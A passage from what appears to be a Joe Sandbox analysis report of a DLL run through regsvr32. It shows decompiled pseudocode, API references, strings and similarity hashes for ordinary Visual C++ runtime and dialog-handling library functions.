					}
					break;
				}
				_t67 = _t21 << 3;
				_t6 = _t67 + 0x10037a90; // 0x98000000
				if(_t52 ==  *_t6) {
					_t21 =  *0x1003a168; // 0x0
					if(_t21 == 1 || _t21 == 0 &&  *0x1003a16c == 1) {
						_t17 = _t67 + 0x10037a94; // 0x1002ef98
						_t69 = _t17;
						_t24 = E10012000( *_t69);
						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
					} else {
						if(_t52 != 0xfc) {
							 *((char*)(_t70 + 0x84)) = 0;
							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
								E10018100(_t70 - 0x80, "<program name unknown>");
							}
							_t63 = _t70 - 0x80;
							if(E10012000(_t70 - 0x80) + 1 > 0x3c) {
								E10019990(E10012000(_t63) + _t70 - 0x45, "...", 3);
								_t73 = _t73 + 0x10;
							}
							_t31 = E10012000(_t63);
							_t12 = _t67 + 0x10037a94; // 0x1002ef98
							_t14 = E10012000( *_t12) + 0x1c; // 0x1c
							_pop(_t57);
							E100116D0(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
							_t51 = _t73;
							E10018100(_t51, "Runtime Error!\n\nProgram: ");
							E10018110(_t51, _t63);
							E10018110(_t51, "\n\n");
							_t15 = _t67 + 0x10037a94; // 0x1002ef98
							E10018110(_t51,  *_t15);
							_push(0x12010);
							_push("Microsoft Visual C++ Runtime Library");
							_push(_t51);
							_t21 = E1001A6B4();
						}
					}
				}
				return E10011A49(_t21,  *((intOrPtr*)(_t70 + 0x88)));
			}

0x10016f7d
0x10016f84
0x10016f8a
0x10016f8f
0x10016f97
0x10016fa0
0x10016fa2
0x10016fab
0x10016faf
0x00000000
0x00000000
0x00000000
0x10016faf
0x10016fb3
0x10016fb6
0x10016fbc
0x10016fc2
0x10016fca
0x100170b7
0x100170b7
0x100170bf
0x100170d1
0x10016fe1
0x10016fe7
0x10016ff7
0x10017005
0x10017010
0x10017016
0x10017017
0x10017027
0x10017043
0x10017048
0x10017048
0x1001704c
0x10017051
0x1001705e
0x10017066
0x1001706a
0x1001706f
0x10017077
0x1001707e
0x10017089
0x1001708e
0x10017095
0x1001709a
0x1001709f
0x100170a4
0x100170a5
0x100170aa
0x10016fe7
0x10016fca
0x100170f2

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016FFD
_strcat.LIBCMT ref: 10017010
_strlen.LIBCMT ref: 1001701D
_strlen.LIBCMT ref: 1001702C
_strncpy.LIBCMT ref: 10017043
_strlen.LIBCMT ref: 1001704C
_strlen.LIBCMT ref: 10017059
_strcat.LIBCMT ref: 10017077
_strlen.LIBCMT ref: 100170BF
GetStdHandle.KERNEL32(000000F4,1002EF98,00000000,?,00000000,00000000,00000000,00000000), ref: 100170CA
WriteFile.KERNEL32(00000000), ref: 100170D1

Strings

Microsoft Visual C++ Runtime Library, xrefs: 1001709F
<program name unknown>, xrefs: 1001700A
Runtime Error!Program: , xrefs: 10017071
..., xrefs: 1001703D

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3601721357-4022980321
Opcode ID: 68c8764e1a8a42900aa5bb584917c7e94fc290cdcfd1a0eeb1350683dc03f151
Instruction ID: 8b4e2df600865ae8db0bab592805acf6cceea193a26af140cc90876f2b48fa7d
Opcode Fuzzy Hash: 68c8764e1a8a42900aa5bb584917c7e94fc290cdcfd1a0eeb1350683dc03f151
Instruction Fuzzy Hash: 4031F372500248AAE732DA74DC85EAE37B8FB48340F20091AF64ADE153DA34EAD58721

Uniqueness

Uniqueness Score: -1.00%

Function 100100C5 Relevance: 22.9, APIs: 15, Instructions: 359
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E100100C5() {
				void* __ebx;
				signed int _t112;
				signed int _t115;
				signed int _t118;
				signed char _t119;
				signed int _t122;
				signed int _t123;
				signed int _t127;
				void* _t132;
				signed char _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed char _t147;
				intOrPtr _t148;
				signed int _t149;
				short _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t163;
				signed char _t164;
				signed int _t165;
				signed int _t166;
				short _t169;
				WPARAM _t171;
				signed int _t172;
				intOrPtr* _t173;
				void* _t174;
				signed int _t186;
				void* _t189;
				signed int _t191;
				WPARAM _t203;
				struct tagMSG* _t208;
				signed int _t209;
				signed int _t211;
				int _t213;
				signed int _t214;
				int _t217;
				signed int _t218;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				void* _t226;
				void* _t228;

				E10011A8C(E1002ADC7, _t226);
				_t112 =  *(_t226 + 8);
				 *((intOrPtr*)(_t226 - 0x10)) = _t228 - 0x20;
				if(_t112 != 0) {
					 *(_t226 - 0x28) =  *(_t112 + 0x1c);
				} else {
					 *(_t226 - 0x28) =  *(_t226 - 0x28) & _t112;
				}
				_t208 =  *(_t226 + 0xc);
				_t217 = _t208->message;
				 *(_t226 - 0x18) = _t217;
				 *(_t226 - 0x2c) = GetFocus();
				_t115 = E10020A8C(_t226, _t114);
				 *(_t226 - 0x14) = _t115;
				if(_t217 < 0x100 || _t217 > 0x109) {
					if(_t217 < 0x200 || _t217 > 0x209) {
						goto L27;
					} else {
						goto L7;
					}
				} else {
					L7:
					if(_t115 == 0) {
						L27:
						 *((intOrPtr*)(_t226 - 0x1c)) = E10020A8C(_t226, _t208->hwnd);
						_t218 = 0;
						 *(_t226 - 0x24) =  *(_t226 - 0x24) & 0;
						_t118 =  *(_t226 - 0x18) - 0x100;
						__eflags = _t118;
						 *((intOrPtr*)(_t226 - 0x20)) = 2;
						if(_t118 == 0) {
							_t119 = E1000F94B( *((intOrPtr*)(_t226 - 0x1c)), _t208);
							_t186 = _t208->wParam & 0x0000ffff;
							__eflags = _t186 - 0x1b;
							if(__eflags > 0) {
								__eflags = _t186 - 0x25;
								if(_t186 < 0x25) {
									L47:
									_t209 = IsDialogMessageA( *( *(_t226 + 8) + 0x1c),  *(_t226 + 0xc));
									__eflags = _t209;
									if(_t209 != 0) {
										_t132 = E10020A8C(_t226, GetFocus());
										__eflags = _t132 -  *(_t226 - 0x14);
										if(_t132 !=  *(_t226 - 0x14)) {
											E1000FDCA(E10020A8C(_t226, GetFocus()));
										}
									}
									L50:
									_t122 = IsWindow( *(_t226 - 0x2c));
									__eflags = _t122;
									if(_t122 != 0) {
										E1000FE37( *(_t226 - 0x14), E10020A8C(_t226, GetFocus()));
										_pop(_t189);
										_t127 = IsWindow( *(_t226 - 0x28));
										__eflags = _t127;
										if(_t127 != 0) {
											E1000FFE5(_t189,  *(_t226 + 8),  *(_t226 - 0x14), E10020A8C(_t226, GetFocus()));
										}
									}
									_t123 = _t209;
									goto L54;
								}
								__eflags = _t186 - 0x26;
								if(_t186 <= 0x26) {
									 *(_t226 - 0x24) = 1;
									L81:
									_t136 = E1000F94B( *(_t226 - 0x14), _t208);
									__eflags = _t136 & 0x00000001;
									if((_t136 & 0x00000001) != 0) {
										goto L47;
									}
									__eflags =  *(_t226 - 0x24);
									_t191 =  *(_t226 + 8);
									_push(0);
									if( *(_t226 - 0x24) == 0) {
										_t137 = E10022E74(_t191);
									} else {
										_t137 = E10022D78(_t191);
									}
									_t222 = _t137;
									__eflags = _t222;
									if(_t222 == 0) {
										goto L47;
									} else {
										__eflags =  *(_t222 + 8);
										if( *(_t222 + 8) != 0) {
											E10022F70( *(_t226 + 8), _t222);
										}
										__eflags =  *(_t222 + 4);
										if( *(_t222 + 4) == 0) {
											_t138 =  *_t222;
											__eflags = _t138;
											if(_t138 == 0) {
												_t139 = E1000F9FA( *(_t226 + 8),  *(_t226 - 0x14),  *(_t226 - 0x24));
											} else {
												_t139 = E10020A8C(_t226, _t138);
											}
											_t211 = _t139;
											__eflags = _t211;
											if(_t211 == 0) {
												goto L47;
											} else {
												 *((intOrPtr*)( *((intOrPtr*)( *(_t226 + 8) + 0x48)) + 0x6c)) = 0;
												E1000FA34(_t211);
												__eflags =  *(_t222 + 8);
												if( *(_t222 + 8) != 0) {
													SendMessageA( *(_t211 + 0x1c), 0xf1, 1, 0);
												}
												goto L90;
											}
										} else {
											 *((intOrPtr*)( *( *(_t222 + 4)) + 0xac))(_t208);
											L90:
											_t209 = 1;
											goto L50;
										}
									}
								}
								__eflags = _t186 - 0x28;
								if(_t186 <= 0x28) {
									goto L81;
								}
								__eflags = _t186 - 0x2b;
								if(_t186 != 0x2b) {
									goto L47;
								}
								L68:
								__eflags = _t119 & 0x00000004;
								if((_t119 & 0x00000004) != 0) {
									goto L47;
								}
								_t147 = E1000F9D9( *(_t226 - 0x14));
								__eflags = _t147 & 0x00000010;
								if((_t147 & 0x00000010) == 0) {
									_t148 = E1000FFB8( *(_t226 + 8));
								} else {
									_t218 =  *(_t226 - 0x14);
									_t148 = E10022A7A(_t218);
								}
								_t213 = 0;
								__eflags = _t218;
								 *((intOrPtr*)(_t226 - 0x20)) = _t148;
								if(_t218 != 0) {
									L76:
									_t149 = E10022AF4(_t218);
									__eflags = _t149;
									if(_t149 != 0) {
										__eflags =  *((intOrPtr*)(_t218 + 0x4c)) - _t213;
										if( *((intOrPtr*)(_t218 + 0x4c)) == _t213) {
											goto L47;
										}
										_push(_t213);
										_push(_t213);
										_push(_t213);
										_push(1);
										_push(0xfffffdd9);
										_push(_t218);
										 *(_t226 - 4) = _t213;
										E10022B51();
										 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
										goto L90;
									}
									MessageBeep(_t213);
									goto L47;
								} else {
									L75:
									_t218 = E1000FEB2( *(_t226 + 8),  *((intOrPtr*)(_t226 - 0x20)));
									__eflags = _t218 - _t213;
									if(_t218 == _t213) {
										goto L47;
									}
									goto L76;
								}
							}
							if(__eflags == 0) {
								L74:
								_t213 = 0;
								__eflags = 0;
								goto L75;
							}
							__eflags = _t186 - 3;
							if(_t186 == 3) {
								goto L74;
							}
							__eflags = _t186 - 9;
							if(_t186 == 9) {
								__eflags = _t119 & 0x00000002;
								if((_t119 & 0x00000002) != 0) {
									goto L47;
								}
								_t153 = GetKeyState(0x10);
								_t223 =  *(_t226 + 8);
								__eflags = _t153;
								_t185 = 0 | _t153 < 0x00000000;
								_t154 = E10022C9C(_t223, 0, _t153 < 0);
								__eflags = _t154;
								if(_t154 == 0) {
									goto L47;
								}
								__eflags =  *(_t154 + 4);
								if( *(_t154 + 4) == 0) {
									_t155 =  *_t154;
									__eflags = _t155;
									if(_t155 == 0) {
										_t156 = E10007389(_t223,  *((intOrPtr*)(_t226 - 0x1c)), _t185);
									} else {
										_t156 = E10020A8C(_t226, _t155);
									}
									_t214 = _t156;
									__eflags = _t214;
									if(_t214 != 0) {
										 *( *((intOrPtr*)(_t223 + 0x48)) + 0x6c) =  *( *((intOrPtr*)(_t223 + 0x48)) + 0x6c) & 0x00000000;
										E1000FA34(_t214);
										E1000FE37( *(_t226 - 0x14), _t214);
									}
								} else {
									 *((intOrPtr*)( *( *(_t154 + 4)) + 0xac))(_t208);
								}
								goto L90;
							}
							__eflags = _t186 - 0xd;
							if(_t186 == 0xd) {
								goto L68;
							}
							goto L47;
						}
						_t163 = _t118;
						__eflags = _t163;
						if(_t163 == 0) {
							L33:
							_t164 = E1000F94B( *((intOrPtr*)(_t226 - 0x1c)), _t208);
							__eflags =  *(_t226 - 0x18) - 0x102;
							if( *(_t226 - 0x18) != 0x102) {
								L35:
								_t203 = _t208->wParam;
								__eflags = _t203 - 9;
								if(_t203 != 9) {
									L37:
									__eflags = _t203 - 0x20;
									if(__eflags != 0) {
										_t165 = E1000FCEF(0x100, _t203, __eflags,  *(_t226 + 8),  *((intOrPtr*)(_t226 - 0x1c)), _t208);
										__eflags = _t165;
										if(_t165 == 0) {
											goto L47;
										}
										_t166 =  *(_t165 + 4);
										__eflags = _t166;
										if(_t166 == 0) {
											goto L47;
										} else {
											E1000AAF8(_t166, _t208);
											goto L90;
										}
									}
									goto L38;
								}
								__eflags = _t164 & 0x00000002;
								if((_t164 & 0x00000002) != 0) {
									goto L47;
								}
								goto L37;
							}
							__eflags = _t164 & 0x00000084;
							if((_t164 & 0x00000084) != 0) {
								goto L47;
							}
							goto L35;
						}
						__eflags = _t163 != 4;
						if(_t163 != 4) {
							goto L47;
						}
						__eflags =  *(_t226 - 0x14);
						if( *(_t226 - 0x14) != 0) {
							L32:
							__eflags = _t208->wParam - 0x20;
							if(_t208->wParam == 0x20) {
								goto L47;
							}
							goto L33;
						}
						_t169 = GetKeyState(0x12);
						__eflags = _t169;
						if(_t169 >= 0) {
							goto L47;
						}
						goto L32;
					} else {
						_t224 =  *(_t226 - 0x14);
						while( *(_t224 + 0x4c) == 0 && E10020A8C(_t226, GetParent( *(_t224 + 0x1c))) !=  *(_t226 + 8)) {
							_t224 = E10020A8C(_t226, GetParent( *(_t224 + 0x1c)));
							if(_t224 != 0) {
								continue;
							}
							break;
						}
						if(_t224 == 0) {
							L17:
							__eflags =  *(_t226 - 0x18) - 0x101;
							if( *(_t226 - 0x18) == 0x101) {
								L20:
								__eflags = _t224;
								if(_t224 == 0) {
									L26:
									_t208 =  *(_t226 + 0xc);
									goto L27;
								}
								_t225 =  *(_t224 + 0x4c);
								__eflags = _t225;
								if(_t225 == 0) {
									goto L26;
								}
								_t171 =  *(_t226 + 0xc)->wParam;
								__eflags = _t171 - 0xd;
								if(_t171 != 0xd) {
									L24:
									__eflags = _t171 - 0x1b;
									if(_t171 != 0x1b) {
										goto L26;
									}
									__eflags =  *(_t225 + 0x80) & 0x00000002;
									if(( *(_t225 + 0x80) & 0x00000002) != 0) {
										L38:
										_t123 = 0;
										L54:
										 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
										return _t123;
									}
									goto L26;
								}
								__eflags =  *(_t225 + 0x80) & 0x00000001;
								if(( *(_t225 + 0x80) & 0x00000001) != 0) {
									goto L38;
								}
								goto L24;
							}
							__eflags =  *(_t226 - 0x18) - 0x100;
							if( *(_t226 - 0x18) == 0x100) {
								goto L20;
							}
							__eflags =  *(_t226 - 0x18) - 0x102;
							if( *(_t226 - 0x18) != 0x102) {
								goto L26;
							}
							goto L20;
						}
						_t172 =  *(_t224 + 0x4c);
						if(_t172 == 0 ||  *((intOrPtr*)(_t172 + 0x54)) == 0) {
							goto L17;
						} else {
							_t173 =  *((intOrPtr*)(_t172 + 0x54));
							_t174 =  *((intOrPtr*)( *_t173 + 0x14))(_t173,  *(_t226 + 0xc));
							if(_t174 != 0) {
								goto L17;
							} else {
								_t123 = _t174 + 1;
								goto L54;
							}
						}
					}
				}
			}

0x100100ca
0x100100d2
0x100100da
0x100100dd
0x100100e7
0x100100df
0x100100df
0x100100df
0x100100ea
0x100100ed
0x100100f0
0x100100fa
0x100100fd
0x10010109
0x1001010c
0x1001011c
0x00000000
0x00000000
0x00000000
0x00000000
0x1001012e
0x1001012e
0x10010130
0x100101db
0x100101e2
0x100101e8
0x100101ea
0x100101ed
0x100101ed
0x100101ef
0x100101f6
0x10010283
0x10010288
0x1001028c
0x1001028f
0x100103cb
0x100103ce
0x100102b6
0x100102c5
0x100102c7
0x100102c9
0x100102d4
0x100102d9
0x100102dc
0x100102e7
0x100102ec
0x100102dc
0x100102ed
0x100102f6
0x100102f8
0x100102fa
0x1001030e
0x10010314
0x10010318
0x1001031a
0x1001031c
0x1001032d
0x1001032d
0x1001031c
0x10010332
0x00000000
0x10010332
0x100103d4
0x100103d7
0x10010484
0x1001048b
0x1001048f
0x10010494
0x10010496
0x00000000
0x00000000
0x1001049c
0x100104a0
0x100104a3
0x100104a5
0x100104ae
0x100104a7
0x100104a7
0x100104a7
0x100104b3
0x100104b5
0x100104b7
0x00000000
0x100104bd
0x100104bd
0x100104c1
0x100104c7
0x100104c7
0x100104cc
0x100104d0
0x100104e6
0x100104e8
0x100104ea
0x100104fd
0x100104ec
0x100104ed
0x100104ed
0x10010502
0x10010504
0x10010506
0x00000000
0x1001050c
0x10010515
0x10010518
0x1001051d
0x10010520
0x1001052d
0x1001052d
0x00000000
0x10010520
0x100104d2
0x100104d8
0x100104de
0x100104e0
0x00000000
0x100104e0
0x100104d0
0x100104b7
0x100103dd
0x100103e0
0x00000000
0x00000000
0x100103e6
0x100103e9
0x00000000
0x00000000
0x100103ef
0x100103ef
0x100103f1
0x00000000
0x00000000
0x100103fa
0x100103ff
0x10010402
0x10010413
0x10010404
0x10010404
0x10010409
0x10010409
0x10010418
0x1001041a
0x1001041c
0x1001041f
0x1001043a
0x1001043c
0x10010441
0x10010443
0x10010451
0x10010454
0x00000000
0x00000000
0x1001045a
0x1001045b
0x1001045c
0x1001045d
0x1001045f
0x10010464
0x10010465
0x10010468
0x10010470
0x00000000
0x10010470
0x10010446
0x00000000
0x10010421
0x10010425
0x10010430
0x10010432
0x10010434
0x00000000
0x00000000
0x00000000
0x10010434
0x1001041f
0x10010295
0x10010423
0x10010423
0x10010423
0x00000000
0x10010423
0x1001029b
0x1001029e
0x00000000
0x00000000
0x100102a4
0x100102a7
0x10010345
0x10010347
0x00000000
0x00000000
0x1001034f
0x10010355
0x1001035a
0x1001035d
0x10010365
0x1001036a
0x1001036c
0x00000000
0x00000000
0x10010372
0x10010376
0x1001038b
0x1001038d
0x1001038f
0x1001039f
0x10010391
0x10010392
0x10010392
0x100103a4
0x100103a6
0x100103a8
0x100103b1
0x100103b6
0x100103bf
0x100103c5
0x10010378
0x10010380
0x10010380
0x00000000
0x10010376
0x100102ad
0x100102b0
0x00000000
0x00000000
0x00000000
0x100102b0
0x100101fd
0x100101fd
0x100101fe
0x1001022a
0x1001022e
0x10010233
0x1001023a
0x10010240
0x10010240
0x10010244
0x10010248
0x1001024e
0x1001024e
0x10010252
0x10010262
0x10010267
0x10010269
0x00000000
0x00000000
0x1001026b
0x1001026e
0x10010270
0x00000000
0x10010272
0x10010275
0x00000000
0x10010275
0x10010270
0x00000000
0x10010252
0x1001024a
0x1001024c
0x00000000
0x00000000
0x00000000
0x1001024c
0x1001023c
0x1001023e
0x00000000
0x00000000
0x00000000
0x1001023e
0x10010200
0x10010203
0x00000000
0x00000000
0x10010209
0x1001020c
0x1001021f
0x1001021f
0x10010224
0x00000000
0x00000000
0x00000000
0x10010224
0x10010210
0x10010216
0x10010219
0x00000000
0x00000000
0x00000000
0x10010136
0x10010136
0x1001013f
0x10010160
0x10010164
0x00000000
0x00000000
0x00000000
0x10010164
0x10010168
0x1001018d
0x1001018d
0x10010194
0x100101a4
0x100101a4
0x100101a6
0x100101d8
0x100101d8
0x00000000
0x100101d8
0x100101a8
0x100101ab
0x100101ad
0x00000000
0x00000000
0x100101b2
0x100101b6
0x100101ba
0x100101c9
0x100101c9
0x100101cd
0x00000000
0x00000000
0x100101cf
0x100101d6
0x10010254
0x10010254
0x10010334
0x10010339
0x10010342
0x10010342
0x00000000
0x100101d6
0x100101bc
0x100101c3
0x00000000
0x00000000
0x00000000
0x100101c3
0x10010196
0x10010199
0x00000000
0x00000000
0x1001019b
0x100101a2
0x00000000
0x00000000
0x00000000
0x100101a2
0x1001016a
0x1001016f
0x00000000
0x10010177
0x10010177
0x10010180
0x10010185
0x00000000
0x10010187
0x10010187
0x00000000
0x10010187
0x10010185
0x1001016f
0x10010130

APIs

__EH_prolog.LIBCMT ref: 100100CA
GetFocus.USER32 ref: 100100F3
GetParent.USER32(?), ref: 10010148
GetParent.USER32(?), ref: 10010158
GetKeyState.USER32 ref: 10010210
IsDialogMessageA.USER32(?,?,?,?,?,00000000), ref: 100102BF
GetFocus.USER32 ref: 100102D1
GetFocus.USER32 ref: 100102DE

Part of subcall function 10007389: GetNextDlgTabItem.USER32(?,?,?), ref: 1000739C

IsWindow.USER32(?), ref: 100102F6
GetFocus.USER32 ref: 10010302
IsWindow.USER32(?), ref: 10010318
GetFocus.USER32 ref: 1001031E
GetKeyState.USER32 ref: 1001034F
MessageBeep.USER32(00000000), ref: 10010446
SendMessageA.USER32 ref: 1001052D

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Focus$Message$ParentStateWindow$BeepDialogH_prologItemNextSend
String ID:
API String ID: 2999224188-0
Opcode ID: 56db4c59f6b27ad05a44fd0264fc1ec7519c3ae96e1b6f05808159883d19c858
Instruction ID: 24fb51d1e6f86d779c1a868f906becb8f2c056fb4188cb8430d2305d0d8abd07
Opcode Fuzzy Hash: 56db4c59f6b27ad05a44fd0264fc1ec7519c3ae96e1b6f05808159883d19c858
Instruction Fuzzy Hash: 50C1A234B00206ABDB21DFA4C889AAE7BF5EF44390F514019F895AF162CBB4EDC1DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10017192 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 59%

			E10017192(void* __ebx, signed char** __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t22;
				intOrPtr* _t23;
				void* _t31;
				void* _t58;
				signed char* _t60;
				signed char** _t66;
				char* _t68;
				void* _t70;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t73;

				_t67 = __edi;
				_t66 = __edx;
				_t54 = __ebx;
				_push(0x118);
				_push(0x1002f1c8);
				E10012CE0(__ebx, __edi, __esi);
				_t22 =  *0x100371f4; // 0x39cf7dc9
				 *((intOrPtr*)(_t72 - 0x1c)) = _t22;
				_t23 =  *0x1003a4b0; // 0x0
				if(_t23 == 0) {
					if( *((intOrPtr*)(_t72 + 8)) == 1) {
						_t68 = "Buffer overrun detected!";
						 *(_t72 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
						_t70 = 0xb9;
					} else {
						_t68 = "Unknown security failure detected!";
						 *(_t72 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
						_t70 = 0xd4;
					}
					 *((char*)(_t72 - 0x20)) = 0;
					if(GetModuleFileNameA(0, _t72 - 0x124, 0x104) == 0) {
						E10018100(_t72 - 0x124, "<program name unknown>");
					}
					_t54 = _t72 - 0x124;
					if(E10012000(_t72 - 0x124) + 0xb > 0x3c) {
						E10019990(E10012000(_t54) + _t72 - 0xf3, "...", 3);
						_t73 = _t73 + 0x10;
					}
					_t31 = E10012000(_t54);
					_pop(_t58);
					E100116D0(_t31 + _t70 + 0x0000000c + 0x00000003 & 0xfffffffc, _t58);
					 *((intOrPtr*)(_t72 - 0x18)) = _t73;
					_t71 = _t73;
					E10018100(_t71, _t68);
					_t67 = "\n\n";
					E10018110(_t71, "\n\n");
					E10018110(_t71, "Program: ");
					E10018110(_t71, _t54);
					E10018110(_t71, "\n\n");
					E10018110(_t71,  *(_t72 - 0x128));
					_push(0x12010);
					_push("Microsoft Visual C++ Runtime Library");
					_push(_t71);
					E1001A6B4();
				} else {
					 *(_t72 - 4) = 0;
					 *_t23( *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
					 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				}
				E10011C32(3);
				asm("int3");
				_t19 =  &(_t66[1]);
				 *_t19 = _t66[1] - 1;
				if( *_t19 < 0) {
					return E1001A7AD(_t54, _t67, _t72, _t66);
				} else {
					_t60 =  *_t66;
					 *_t66 =  &(_t60[1]);
					return  *_t60 & 0x000000ff;
				}
			}

0x10017192
0x10017192
0x10017192
0x10017192
0x10017197
0x1001719c
0x100171a1
0x100171a6
0x100171a9
0x100171b2
0x100171d7
0x100171ef
0x100171f4
0x100171fe
0x100171d9
0x100171d9
0x100171de
0x100171e8
0x100171e8
0x10017203
0x1001721b
0x10017229
0x1001722f
0x10017230
0x10017245
0x10017264
0x10017269
0x10017269
0x1001726d
0x10017272
0x1001727d
0x10017282
0x10017285
0x10017289
0x1001728e
0x10017295
0x100172a0
0x100172a7
0x100172ae
0x100172ba
0x100172bf
0x100172c4
0x100172c9
0x100172ca
0x100171b4
0x100171b4
0x100171bd
0x100171c1
0x100171c1
0x100172d4
0x100172d9
0x100172da
0x100172da
0x100172dd
0x100172ef
0x100172df
0x100172df
0x100172e5
0x100172e7
0x100172e7

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,1002F1C8,00000118,10011A31,00000001,00000000,1002E848,00000008,100170E8,00000000,00000000,00000000), ref: 10017213
_strcat.LIBCMT ref: 10017229
_strlen.LIBCMT ref: 10017239
_strlen.LIBCMT ref: 1001724A
_strncpy.LIBCMT ref: 10017264
_strlen.LIBCMT ref: 1001726D
_strcat.LIBCMT ref: 10017289

Strings

Program: , xrefs: 1001729A
Microsoft Visual C++ Runtime Library, xrefs: 100172C4
<program name unknown>, xrefs: 1001721D
Buffer overrun detected!, xrefs: 100171EF, 10017287
..., xrefs: 1001725E
Unknown security failure detected!, xrefs: 100171D9

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _strlen$_strcat$FileModuleName_strncpy
String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
API String ID: 3058806289-1673886896
Opcode ID: 21d78823f48611dff99e1650d3bc88c8259584d6f344628f086aad00bfea2042
Instruction ID: 19ecb47b45d33fe3bd27c3986d3733d74a7dd1b29f40fd9d70e1a0664b46184a
Opcode Fuzzy Hash: 21d78823f48611dff99e1650d3bc88c8259584d6f344628f086aad00bfea2042
Instruction Fuzzy Hash: E431E8769002187BDB11D7609C86FDE3668EF05390F50016AF514AE143DB35EBD287A5

Uniqueness

Uniqueness Score: -1.00%

Function 100144DA Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E100144DA() {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				long _t12;
				_Unknown_base(*)()* _t16;
				void* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				struct HINSTANCE__* _t32;

				if(E10014B8B() != 0) {
					_push(_t30);
					_t26 = GetModuleHandleA("kernel32.dll");
					__eflags = _t26;
					if(_t26 != 0) {
						_t30 = GetProcAddress;
						 *0x1003a1c8 = GetProcAddress(_t26, "FlsAlloc");
						 *0x1003a1cc = GetProcAddress(_t26, "FlsGetValue");
						 *0x1003a1d0 = GetProcAddress(_t26, "FlsSetValue");
						_t16 = GetProcAddress(_t26, "FlsFree");
						__eflags =  *0x1003a1cc;
						 *0x1003a1d4 = _t16;
						if( *0x1003a1cc == 0) {
							 *0x1003a1cc = TlsGetValue;
							 *0x1003a1d0 = TlsSetValue;
							 *0x1003a1c8 = E100142BA;
							 *0x1003a1d4 = TlsFree;
						}
					}
					_t7 =  *0x1003a1c8(E10014364);
					__eflags = _t7 - 0xffffffff;
					 *0x10037494 = _t7;
					if(__eflags == 0) {
						L9:
						E100142C3();
						_t9 = 0;
						__eflags = 0;
					} else {
						_push(0x8c);
						_push(1);
						_t32 = E10013955(_t22, 1, _t30, __eflags);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L9;
						} else {
							_t11 =  *0x1003a1d0( *0x10037494, _t32);
							__eflags = _t11;
							if(_t11 == 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t32 + 0x54)) = 0x10037a08;
								 *((intOrPtr*)(_t32 + 0x14)) = 1;
								_t12 = GetCurrentThreadId();
								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
								 *_t32 = _t12;
								_t9 = 1;
							}
						}
					}
					return _t9;
				} else {
					E100142C3();
					return 0;
				}
			}

0x100144e1
0x100144eb
0x100144f8
0x100144fa
0x100144fc
0x100144fe
0x10014512
0x1001451f
0x1001452c
0x10014531
0x10014533
0x1001453a
0x1001453f
0x10014546
0x10014550
0x1001455a
0x10014564
0x10014564
0x1001453f
0x1001456e
0x10014574
0x10014577
